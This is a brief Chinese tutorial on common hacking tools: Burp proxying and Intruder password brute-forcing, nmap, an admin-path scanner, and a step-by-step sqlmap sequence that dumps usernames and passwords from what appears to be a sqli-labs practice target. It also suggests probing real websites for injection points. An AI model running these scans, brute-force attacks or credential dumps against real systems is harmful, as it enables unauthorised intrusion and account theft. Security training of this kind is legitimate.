黑客工具精讲

黑客工具精讲

1、浏览器工具使用 加解密操作 可对字段进行加解密操作，设置代理，以及查看js源码等。

2、Burp工具抓包和密码爆破 （1）配置代理 获取Burp中的代理所用ip和端口，在浏览器中新建代理。 浏览器配置好代理之后，打开抓包功能。 在浏览器中输入链接，即可在Burp中抓到数据包，点击Forward后将数据包发出。

3、密码爆破 输入密码后，获取该数据包 将数据包发送至Intruder 在Intruder的Positions中，设置爆破点 在Payload中load加载字典库，而后点击Start attack开始爆破

4、nmap工具检测ip开放的端口信息 新建窗口 输入ip，选择nmap ip命令进行扫描端口

5、御剑后台扫描工具 输入域名或ip，扫描网站后台文件

6、sqlmap工具使用 利用url中存在sql注入点进行sql注入公攻击

（1）寻找有sql注入漏洞的网站尝试在url中加入?id=1'，测试是否报错，报错即找到sql注入点。

（2）使用sqlmap工具扫描爆破点 python sqlmap.py -u "http://zqyyds.free.idcfengye.com/sqllib/Less-2/?id=1"

（3）扫描数据库python sqlmap.py -u "http://zqyyds.free.idcfengye.com/sqllib/Less-2/?id=1" --dbs

（4）扫描数据库中存在的表 python sqlmap.py -u "http://zqyyds.free.idcfengye.com/sqllib/Less-2/?id=1" -D dvwa -tables

（5）扫描数据库表下的关键字python sqlmap.py -u "http://zqyyds.free.idcfengye.com/sqllib/Less-2/?id=1" -D dvwa -T users --columns （6）扫描数据库表下的关键字中的具体属性值python sqlmap.py -u "http://zqyyds.free.idcfengye.com/sqllib/Less-2/?id=1" -D dvwa -T users -C user,password --dump

（7）扫描完毕获取加密后的密码，解密后即可得到明文。